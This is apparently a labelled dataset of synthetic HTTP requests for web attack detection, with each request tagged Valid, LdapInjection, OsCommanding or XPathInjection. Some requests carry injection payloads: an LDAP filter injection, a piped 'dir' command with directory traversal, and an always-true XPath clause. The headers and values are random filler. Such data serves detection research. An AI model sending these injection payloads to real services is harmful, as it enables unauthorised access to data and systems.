class: LdapInjection
PUT /3positionr28oK520a.php4? HTTP/1.1
Content-Length: 363
Content-Language: n,n0Towlty
Content-Encoding: gzip
Content-Location: /nnulx/mLui/scytAae/3jtoitsi/auae.nsf
Content-MD5: Rmhkb3NzRGx3NmVzc0VOMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.nnihbktsr.com:87
Connection: close
Accept: application/*, application/*, application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: agri8E='rsaerbzL'
Client-ip: 204.9.113.47
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Mon, 08 Aug 05 14:18:44 GMT
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: s7hcLn
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Mar 05 05:31:21 GMT
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: "HEp0ai61ornC7BMazM"
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Tue, 26 Jul 05 05:33:33 UTC
Max-Forwards: 54
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic cmloamVyZ2U6dG9pbg==
Range: 36-,-7
Referer: http://hrfe.fr/itdt.msf
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.8 (X11; U; SunOS sun4u 0.3; mn-E9; rv:8.7.7) Gecko/64495512
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

ohesftiekiLqr=mpF2m&olRGreltbnnExw=525&OCtnl=9&4touEl7e=26294&libO4iroRLd7a=14)(&(objectClass=lHr)(|(sn = eeo)(cn=cMse J*))&ro=ateat&teoycausroSall=nistsxmlb M;:ishlike &ipsforkiel1t=807167245&R2tsAi=bs/aenmAObinm&atts0ysotpci0=htpasslIojh(7oe&Toaxpdfeh&aAndtui=vB34&zuls5snep=xzpncaeaccess_logaiutoa&@EoMMJR=ihk&nke=pln:

End - Id: 37570
Start - Id: 42904
class: OsCommanding
GET /sIhmTVosnomL3Hia02k/iEVYZ8DeitW/let40h@zoptuk/zJdocumenta_lDGND0d/jucIrreplace@/hkQG8thIB02oYF2a6I5Y/p8e2oDLo/4ysGWnYpOs@H/s.k7Tt10/jjtlsseas/r7MJAYf/eotprtr.sh?nny54mhfssxSrk=j5au4n4CYn_J&bsgf4oer=o27qhT-%40U&orqOwkzlaC33=alogfeE&hRmf9ne=Ut0bgtieIaaWroIH&ORwxw.inJVOH=%2Bu&lw9Ascaeeo=%7C+++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&zd=irhsotn&ylswaonihtw=huU&neaaprdystBh=8572747662&faalmtelirdit=00935&lgiiuxn_8=991 HTTP/1.1
Host: 158.241.253.53
Connection: keep-alive
Accept: text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: tihc='ca5es'
Date: Wed, 18 Oct 06 15:28:59 GMT
Max-Forwards: 9637
Referer: /5r1eeCni/osaoa/hxeuo.mpeg
User-Agent: i15LCueth (dD7CBCN; ik2PjE@n; mFgDbg13P; 0r.anzES0)
UA-OS: Linux
UA-Color: color32
X-Serial-Number: 369729457285748894

null

End - Id: 42904
Start - Id: 33457
class: Valid
PUT /0Wj7e0fg@/g4hTqp2O0.tiff? HTTP/1.1
Content-Length: 214
Content-Language: 3wihAIDa
Content-Encoding: deflate
Content-Location: /iii0e.sh
Content-MD5: c25pdW1lcnRlYm5yZFIzeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Nov 04 22:21:32 GMT
Last-Modified: Mon, 08 Feb 10 20:40:57 CET
Host: 138.122.106.238:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-ipi, tfol-tuge3las
Cache-Control: aaEbhD0t=2
Client-ip: 20.92.114.90
Cookie: ne=icaaw
Cookie2: $Version="15"
Date: Thu, 23 Sep 04 19:39:21 GMT
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: rypkuF@annazi.gov
If-Modified-Since: Sat, 16 Dec 06 18:08:55 CET
If-Unmodified-Since: Thu, 27 Mar 08 10:42:37 GMT
If-Match: *
If-None-Match: "y96bF06XRy3Bj196g4-"
If-Range: *
Max-Forwards: 579
MIME-Version: 9.1
Pragma: Itatls4='ymticAd'
Proxy-Authorization: Digest nc=84aC5fF6
Authorization: Digest algorithm=MD5
Range: 02748-,068714-
Referer: /gz5asn/Afqoltbt/aRsaa6s.asp
TE: trailers,gzip;q=0.4,chunked
Trailer: Authorization
User-Agent: Mozilla/6.8 (compatible; 4leeiNf; Open BSD i586; wenSte)
UA-CPU: MIPS
UA-Disp: 2518,5185,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 460x027
Via: 8.5 www.onsnjnTb.gif, 1.7 207.153.119.141
Transfer-Encoding: identity
Upgrade: 03e5/6.4, leni/2.7
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nJen=EisJda&uiiootetg=rn~&oeese=ohom&1t4gw2oaasrasd=nall&7aa=sixml&ted=ee9t4cpb(3faaoi&lfinho7ctrTm65h=ilerurleinus&jonneetzbtt=s(o4es&access_log5TfFBg=26645623&onmEia= lv6shtn5tner3s&tybeehOosaayA=nullas igd

End - Id: 33457
Start - Id: 49806
class: XPathInjection
GET /sywd/aucs.jpg?s6hwreikrtSep=dwwt%2Faetie%2Fnssl%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D88%5D+++++%7C+++oe%2FTmod%2Fwt%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+or++%275i6c%27%3D++%27&ddi=40603943&mecupngbh=oho5htacces&h3ttnsfx=hlbodywnotarrr HTTP/1.0
Host: 26.207.214.141
Connection: kiteto2
Accept: */*
Accept-Charset: koi8-r;q=0.9, x-mac-hebrew, x-mac-greek, hz-gb-2312;q=0.6, gb2312;q=0.0
Accept-Encoding: gzip
Accept-Language: 1eii-mAfitbe, 5csot-faworenY, ftUo-nmlrdrxo;q=0.2, mPiush-rzrelmin;q=0.7
Cache-Control: no-cache
Client-ip: 41.236.97.233
Cookie: diolt7loaati=dica5sueyemoie2d;Vi-4GT05_=66521;de=28;sMuw=760813281;nyasuerpzd1ahs=wiJrlVPkM;rciaaxo=80
Cookie2: $Version="01"
Date: Sat, 31 Dec 05 24:16:10 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: rtelms@eo74lfn.ch
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Tue, 24 Mar 09 15:19:08 CET
If-Match: *
If-None-Match: *
If-Range: "1r5@Ia9K@9zAF79wC.o"
Max-Forwards: 5
MIME-Version: 7.3
Pragma: o='x'
Proxy-Authorization: Digest nonce
Authorization: creww rhlhoo=anoa
Range: 1-,586-,-3399
Referer: /r1voeas/nnYanlz.php4
TE: chunked,deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 8.3; Eh-ha; rv:9.4.6) Gecko/00462128
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: 0.8 www.rohfssW6.js, 5.6 233.4.8.123
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 134.221.245.253
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49806
Start - Id: 27696
class: Valid
GET /d3N/siseyw/s56feishStjoceld9oeu/xoeieiuehreszthoFSn/XUmbg-9Q.ZhoHr/d_HFuboot.iniCJg@sVs/oYLtqQHl2I6VIwFS/VleefNheiunk3e0e1/tXe/2qyor/tBUKw-rCjWsto.bin?ntmedohr=le&dDrFte7lek=yddl5ag0ona&ldsig0rh1=N HTTP/1.1
Host: www.ceatseoh.fr
Connection: erftnen1
Accept: image/*
Accept-Charset: utf-7;q=0.4, x-mac-turkish;q=0.8, iso-8859-7;q=0.1, x-mac-greek;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=458
Client-ip: 65.171.231.40
Cookie: gruhoc=4;ot3a7e0ejax=m4-cq9A;sthhsytst7o=5482916;phNia1rtl=ihwwp-npsall
Cookie2: $Version="78"
Date: Wed, 16 Jul 08 01:23:35 GMT
ETag: "mytNxrzipP7GNv4wnVi"
Expect: ee4re=lemXfen
From: bTem2@peiaee.st
If-Modified-Since: Wed, 25 May 05 22:16:21 CET
If-Unmodified-Since: Wed, 25 Jun 08 24:55:40 CET
If-Match: "9.y9JRJtY94iEqSnqXiQ"
If-None-Match: *
If-Range: *
Max-Forwards: 559
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Tsalfe tetpar=glslw3an
Authorization: Digest algorithm=myyej
Range: 19057-557
Referer: /psim2lzt/rfaaooN/byte/nrsi.mspx
TE: gzip;q=0.6
Trailer: Range
User-Agent: Mozilla/3.9 (compatible; Konqueror/0.1; Mac OS X; ancuhf0; dioBs)
UA-CPU: PowerPC
UA-Disp: 9899,7417,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 576x948
Via: HTTP/4.7 243.247.31.186, 1.3 239.9.136.164:57632
Transfer-Encoding: identity
Upgrade: tdiRu/5.5, t6o0dD/7.2
Warning: 308 www.tixKj.jpg "aaearsdrrhaedma" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27696
Start - Id: 24093
class: Valid
GET /WTRzmEWp..js?nOP=ea%3D+lib&EDxbgsound7iVeln4n=auo&reo=392685&rseae=tzoT&gfierLsz=a%2F%2B&ula7rdH=sijyMH+2pir HTTP/1.0
Host: 37.44.192.244
Connection: 4anhwg
Accept: video/*, image/jpeg;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: 8fnega-onhge6mO;q=0.3, cmhtnt-bav, zyiar-i;q=0.0, qboayE-0eac;q=0.8
Cache-Control: no-transform
Client-ip: 184.105.104.188
Cookie: Ruo=tveurrlCetl0tbd8;trimdr9jneeaens=wo7w4Mzp;RbkbLSw=eCLuqYKiOGk;atrator1g=tdCdHYsz;irusrsA=l3uA8qe0AyPups1m;onateeAacds=Wea
Cookie2: $Version="9"
Date: Fri, 16 Nov 07 23:47:36 CET
ETag: W/"RwJz-c4M0e2bHfKhkNp3"
Expect: 100-continue
From: idehs@lb6ztam.biz
If-Modified-Since: Mon, 16 Oct 06 08:36:53 UTC
If-Unmodified-Since: Thu, 04 Jan 07 24:34:09 CET
If-Match: "hA0Z5B5PBUOiVIFcPq"
If-None-Match: "a_@OJqy9iuQ1gza0NTum"
If-Range: Mon, 20 Dec 04 14:47:34 CET
Max-Forwards: 917
MIME-Version: 3.7
Pragma: b='bo'
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: Digest algorithm=MD5
Range: 8656-,477-859015,5910-
Referer: http://hsev3he.fr/eaiao3sv/i3ckn/rhpii/a42usbwo/oea6.jsp
TE: chunked;q=0.5,deflate,trailers
Trailer: Range
User-Agent: aahtt/1.6.0
UA-CPU: 68000
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 390x221
Via: 2.4 120.132.88.85, 5.9 www.s1Oexnf.jpg
Transfer-Encoding: compress
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 178 126.189.30.55 "LptaNsntoaeessie6" "Sun, 23 Jul 06 12:48:27 CET"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24093
Start - Id: 6489
class: Valid
PUT /hJIqxxbH8BLiWp/sCQZxnk/d9/ubezy2/01ZKVqYfYjj_/mailM2ntF9.w/zitn/er/c5/ytmpX9gMdiUg.a7h.dll? HTTP/1.0
Content-Length: 197
Content-Language: Bnr,deMl,bEfhsal
Content-Encoding: deflate
Content-Location: http://lsie.it/lNbirr/hoEsrT/myioefh/EKoxm/vtiTrth.gif
Content-MD5: ZXM5VDZibzlkOHNpcnhIcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Oct 04 16:47:53 GMT
Last-Modified: Mon, 01 Sep 08 03:55:31 CET
Host: www.nonild.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.0
Accept-Encoding: 
Accept-Language: rm-osuch
Cache-Control: only-if-cached
Client-ip: 194.233.104.97
Cookie: ieho9totuf=e;mioessai4lwa=?n<rna=lhif4ai o+nf;nteeiaa=uead;iT0seda9nh=98590360
Cookie2: $Version="35"
Date: Fri, 06 May 05 24:06:12 UTC
ETag: "xSE585VymaFvBo5P"
Expect: 100-continue
From: enpkvak@ard9atrm.de
If-Modified-Since: Thu, 07 Feb 08 22:58:27 CET
If-Unmodified-Since: Thu, 28 Apr 05 13:05:32 UTC
If-Match: *
If-None-Match: *
If-Range: "bjnWcTHM5GSZ500C4d"
Max-Forwards: 4341
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="srqEeu"
Authorization: Basic bjlwZTpxZmNlb3Ixbg==
Range: 135480-
Referer: /sArl/LNyl5/1abhb/eSAnar/nun3.htm
TE: gzip,chunked;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 8.1; cF-re; rv:8.8.5) Gecko/02749225
UA-CPU: Sparc
UA-Disp: 535,2625,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3689x7049
Via: HTTP/0.8 www.2Eiea.html:5450
Transfer-Encoding: gzip
Upgrade: ropcwa/9.2
Warning: 330 www.oaieioL.png:8 "3tprg" 
X-Forwarded-For: 25.241.101.9
X-Serial-Number: 91454032929892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

anrrG49ftKnul=eeo&3F33=ltrhbe ls&ene0turonptn=he&g_PhfNf5_xmlll=iuc3.f&r5tvtnoGts=3@t&vfaon=03378&26=7&helrihiNsH4bp=ir0d&aetnefxL=1828680&ene=epseh'&05v-gpn=sktmeo5i-inp~ep'hbj2&dz6rba=muw

End - Id: 6489
Start - Id: 5543
class: Valid
PUT /poltroqfele7aAv/jNJ./hgheiau/sih4isxo8nRej/eyo7et/sU./ayxRC9wIV8uri69tg76/heV-v/y2-oSg5WP0ky@fjuq0I.png? HTTP/1.1
Content-Length: 61
Content-Language: ttdw,scou
Content-Encoding: compress
Content-Location: http://ltrp9.de/uumq/d5eanm/petlEE/eEtie/pooSEopR.wmn
Content-MD5: WEdpc3l4bGU3bm9Mbnl5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Feb 09 08:39:06 GMT
Last-Modified: Thu, 07 May 09 11:22:14 GMT
Host: www.cxdvhtbtl.cz
Connection: close
Accept: audio/*;q=0.8, image/*;q=0.6, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate, gzip
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 243.193.112.100
Cookie: rthbfuhelpjsD4=sE;uazBrHhiieixa=ibk;inLneuyupd=038676
Cookie2: $Version="9"
Date: Mon, 11 May 09 02:50:37 CET
ETag: W/"H8JPI40baMqM55lkNgM"
Expect: 100-continue
From: niaHt3Oo@ny0dtrh.net
If-Modified-Since: Sun, 11 Mar 07 01:56:12 GMT
If-Unmodified-Since: Mon, 17 Sep 07 14:00:12 GMT
If-Match: "8DmGzvyoGbR-sj3pJH"
If-None-Match: "CFFNnK_sYCEX.0I4"
If-Range: "p_Ch4iZHjIxEu6nD"
Max-Forwards: 741
MIME-Version: 1.1
Pragma: aeiegds=6rseqt
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: Basic c3ZGcGc6aUlsb28=
Range: 6092-077254
Referer: http://www.ghieenr.biz/muse2tro/4a5rh/oenmdc/ioah9teh/mtiadetc.aspx
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 5.6; ui-nt; rv:8.0.7) Gecko/55380506
UA-CPU: x86
UA-Disp: 0010,843,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9319x330
Via: 6.6 21.6.242.194, 4.8 www.Lhileuer.jpg
Transfer-Encoding: gzip
Upgrade: eseJ/5.2, eTyY/2.2
Warning: 780 188.52.238.187:59 "NCkieadp6inaino" 
X-Forwarded-For: 176.55.228.31
X-Serial-Number: 5097796244152405039
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

XNpRZ5QYM=oO4yU&prlnwE0i=&mwbtu+aot&s9Xy=nwrfBimfr8cSbtcm

End - Id: 5543
Start - Id: 32854
class: Valid
PUT /roSfneIHataer9d/s0eoc/evDP4Ma49TgemS/sE/xeemezeRidcnlhlsrt4R/eooeha6tm/dcC2i8b0V/ihlg9mbnf7kOuipfxx/dt2bNydaaeturihm/rz5oa58AmsazNGONHyE.swf? HTTP/1.1
Content-Length: 56
Content-Language: amy6it,scree
Content-Encoding: deflate
Content-Location: /et8ens/eeWbn/nw9jIn/tyu8/o0ef.exe
Content-MD5: dnJnZWZvaHNhdGVrZTNncg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Aug 08 09:51:56 UTC
Last-Modified: Fri, 24 Jun 05 06:48:30 GMT
Host: www.8jdutr063.it
Connection: Dyunqei
Accept: */*
Accept-Charset: us-ascii, cp-950;q=0.8, koi8;q=0.4
Accept-Encoding: identity;q=0.5, compress, identity, gzip;q=0.1, identity;q=0.2
Accept-Language: *;q=0.8
Cache-Control: max-stale=91
Client-ip: 50.137.205.249
Cookie: rim=s42swc;tcL1msay3=3891;Doemr=skh
Cookie2: $Version="61"
Date: Sat, 19 Sep 09 10:18:28 UTC
ETag: W/"UoPCeFepRdsCiMeJFW"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Thu, 25 Jun 09 18:37:49 GMT
If-Unmodified-Since: Mon, 18 Aug 08 09:45:37 UTC
If-Match: *
If-None-Match: "Md1pdi-bns3uuR@ZUr"
If-Range: Thu, 29 May 08 20:01:45 CET
Max-Forwards: 8044
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: NTLM bGVlSmZoYWluc25yaHNyMnNsNnRBdHJseGswbnVkNXlzZHRkb3ZhdWw=
Range: 2086-1,90-
Referer: http://hdion.biz/edduqa3/cNgboeqf/utitirtd.nsf
TE: chunked;q=0.8,deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Mozilla/6.0 (compatible; MSIE 8.6; Linux i586; rtqw)
UA-CPU: PowerPC
UA-Disp: 1358,6257,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: 2.3 223.105.134.69, HTTP/7.8 106.56.241.113
Transfer-Encoding: compress
Upgrade: d8jw0/9.1
Warning: 539 174.52.125.218:7 "gaeepmhroih" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

uoerons1ttE=$nnc)&a9s1oh=agWMchn&y.zza=narAtselanneo

End - Id: 32854
Start - Id: 27214
class: Valid
GET /l9iPFqyK3ZbG/ltvrsaRa/seteeihA4vtkeay/65tscsaei4taaG/ax/tqxB2ylb7/drvacye1leir/x7erikiDvVhOWk9/en22zyoXSMlcfjpqML/sLt4DC5@Ozw5/hohTatosne/neMnfqnhciaetH6lidd.gif?13adseai=tfor+Haye%5C%3Fr&mtmpLHF1Mk=agegtoq+Tzonullo&f6Ns=robjectwp-%3AU1eu+ygaan&Hrhistisg=raCH&ie2=8&gert1ss=nij+dtlmias++ee&sawaslrN6ty=6006203804&loVQ5BTD=+Eh%5D&6tovesrosbR6mIm=lrotsah&fltmcTt=fte1hh&oa=ac0eEvYnetcattRm&atn4=nrvGw9ftmwm3 HTTP/1.0
Host: www.y0lnh.it
Connection: keep-alive
Accept: application/*;q=0.9, video/mpeg
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=212
Client-ip: 129.5.194.59
Cookie: qyetdEayllpasii=a;rdU0O=e1e2\cfsib;sjfMb=Mohnyryui;MNqFKIEIBLTj=a8fVna
Cookie2: $Version="883"
Date: Wed, 15 Nov 06 20:15:03 UTC
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: sUpI=shahsoEh;teth0f1o=nebdm4
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Thu, 15 Mar 07 05:57:48 GMT
If-Unmodified-Since: Thu, 19 Oct 06 11:59:06 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 15 May 09 12:32:16 UTC
Max-Forwards: 565
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bnRzbjVsZWhzbmVzcG1mZjZ0RWR0c2FlcXJyZVVzNXJlZWV2YWR1MXdv
Authorization: sIaieC zon1iAtz=slii6a4
Range: -69817,-9
Referer: http://ttpEoi.ch/trpxeKs/mrIg10ts/ETTaay.jpeg
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/3.3 (Windows; U; WinNT 8.8; c8-l7; rv:7.4.7) Gecko/36338500
UA-CPU: 68000
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/9.1 177.144.162.95:05, 9.0 224.150.216.142:840, doOti/7.4 www.rshti2.html
Transfer-Encoding: deflate
Upgrade: etani/8.7, cfAetN/7.0
Warning: 126 www.tttHrTrO.gif "d5Snbahld" 
X-Forwarded-For: 174.60.99.103
X-Serial-Number: 74622774860135514346
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27214
Start - Id: 24270
class: Valid
GET /hIsNSfy/t9Z0VRU/e@/@bH2XLBN/9vXyW4nRSC-im-o/tfhtsSodseSn/deueoae/tE/ari01Nic0ko90mptae/zlnin0dhaoefhlwr.png?e88riOt3lavsexa=81545185&6Pchild8WNamhttps2=awpP&pueet=rcpo&hDtar=312327713&au=ncec&D9KHnNv=45117 HTTP/1.0
Host: 183.98.82.64:80
Connection: yeiof
Accept: application/*;q=0.5
Accept-Charset: ks_c_5601-1987;q=0.9, cp-936;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 91.45.38.120
Cookie: NpEau=diva7imt;tositosadiyso=848;litdge=1972740;kx8dtedseH=20658151;jmdvsykt=tesKeaeDial2
Cookie2: $Version="205"
Date: Sat, 25 Sep 04 15:00:55 UTC
ETag: W/"PJ5IQ0OHsDaHk-WcL9"
Expect: oeht=l9TsdoR;totD
From: somsctd@slielEozga.ch
If-Modified-Since: Fri, 12 Jun 09 10:46:15 GMT
If-Unmodified-Since: Sun, 08 Nov 09 11:11:38 CET
If-Match: "cEW7kFxmNXQgTaITI"
If-None-Match: "JY67smCLtMJXbe2"
If-Range: "yW01WTZgr6-MCZY"
Max-Forwards: 4
MIME-Version: 8.2
Pragma: mfvsgn='hhs'
Proxy-Authorization: Basic Y2k3cGU5bjphbnNlYQ==
Authorization: NTLM bW90Y2Zzc28xc2h3aXN6YWVleXRzaGJvbWR0YXJlaWVtdGltYWk2bjJzNGw5aA==
Range: 6702-
Referer: /nznhi0/dhea/rHafdfn/owlrcu/6aah.jsp
TE: deflate,trailers
Trailer: Trailer
User-Agent: ude33rc (tlUPg_SCqV; sMVRTeR; mhjDzCs)
UA-CPU: PowerPC
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 982x566
Via: 8.3 51.130.121.183, 7.6 www.tlore.shtml
Transfer-Encoding: identity
Upgrade: nmsBw/3.6
Warning: 698 155.250.223.172 "sso2" 
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 2123375255700978205
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24270
Start - Id: 25469
class: Valid
GET /3@XkEZn/yFEFqF/mmf/tZ/hK.pl? HTTP/1.0
Host: 215.114.169.245:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad, macintosh;q=0.5
Accept-Encoding: 
Accept-Language: rcstog-8At, eii-haN5yizy, r-eEuoes, rtTulehi-olnaaMr
Cache-Control: no-cache
Client-ip: 16.186.114.94
Cookie: erxWHLa=cr ia8niabgsoundO;taiYr7igm=43;0rnigthi=nbetweenl7ds;iemh3ppr3reN=tbo;thuir25ty1atx=siTistyca jx
Cookie2: $Version="7"
Date: Fri, 19 Mar 04 23:00:33 CET
ETag: W/"l.B2SHxR7QfwYN8Nx_AT"
Expect: iela
From: aol8LiS@eneda.cz
If-Modified-Since: Tue, 03 Aug 04 10:33:39 UTC
If-Unmodified-Since: Mon, 12 Jan 09 18:36:03 CET
If-Match: "kxNc0t5xd.uRy7r"
If-None-Match: *
If-Range: Tue, 28 Mar 06 23:31:19 GMT
Max-Forwards: 622
MIME-Version: 7.1
Pragma: 3=Ea
Proxy-Authorization: Digest opaque="tIen"
Authorization: westa o3drrk=rsete
Range: -7599
Referer: /ce6Yuo.cfm
TE: gzip
Trailer: Via
User-Agent: iBmdl1CWnD http://www.odn9g.de
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 710x415
Via: tied0/5.2 89.108.184.44, 6.1 www.HaEg.js, 6.4 www.icnhteec.jpg:03
Transfer-Encoding: identity
Upgrade: beumb/2.2, f5l/6.8
Warning: 416 102.2.131.29 "kRtoim" "Sun, 08 Nov 09 07:27:56 CET"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25469
Start - Id: 34361
class: Valid
PUT /bwE/rseaad0NCr/2LYad/ZZa0.jsp? HTTP/1.1
Content-Length: 190
Content-Language: ypet
Content-Encoding: identity
Content-Location: /feacoan/eQvo1/r93sf/osoln/AeoRtks8.php4
Content-MD5: c3hsb21hdGFzZGFxZWx2bA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Feb 10 11:51:07 GMT
Last-Modified: Tue, 13 Apr 10 18:26:59 UTC
Host: www.teidyty.uk:80
Connection: tsrltDw
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity
Accept-Language: 1a-geq3ht, sTed-5r3ii;q=0.3, an5Xn9h-3tdewOg;q=0.8
Cache-Control: only-if-cached
Client-ip: 42.146.40.83
Cookie: i3=O$i
Cookie2: $Version="527"
Date: Tue, 18 Jul 06 02:53:36 GMT
ETag: "Jbe.7Cnz-Xo5NknhWt7"
Expect: 3ho2
From: lroe@j5dnTa1qd.biz
If-Modified-Since: Tue, 15 Mar 05 01:13:55 CET
If-Unmodified-Since: Tue, 12 Feb 08 06:26:12 GMT
If-Match: "ZlFlv12S_VDSBhh@8_c"
If-None-Match: *
If-Range: Mon, 11 Jul 05 05:52:35 UTC
Max-Forwards: 892
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: rtmr t1aueds=afpacjd
Range: 2495-218225,-34
Referer: /ssuoi/7rnnjnn/sitx/eearod6.bin
TE: chunked,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.8 (Windows; U; WinNT 8.3; eT-ee; rv:2.0.7) Gecko/70044614
UA-CPU: Sparc
UA-Disp: 6654,1299,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 015x732
Via: FTP/0.3 91.93.194.162:95, HTTP/4.3 60.65.194.69, 2.4 233.102.53.121:69
Transfer-Encoding: cntdo
Upgrade: eoutbj/8.4, dau/7.9, Igo/3.3, ugequ/9.4
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 418428957866
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yet=2hYk&Qtob8= ]cnodevaraccess_log  iznode%l f ryw&aotendzabLolss=Eateereha&TseEn95nsoah3d=iame4s9rsseszd&qtssshtNhebt=od0rd88du0&iframeLdeletebodyV7UT5=g8sveE&sn5dtgteldw=gih4et ye:a

End - Id: 34361
Start - Id: 13807
class: Valid
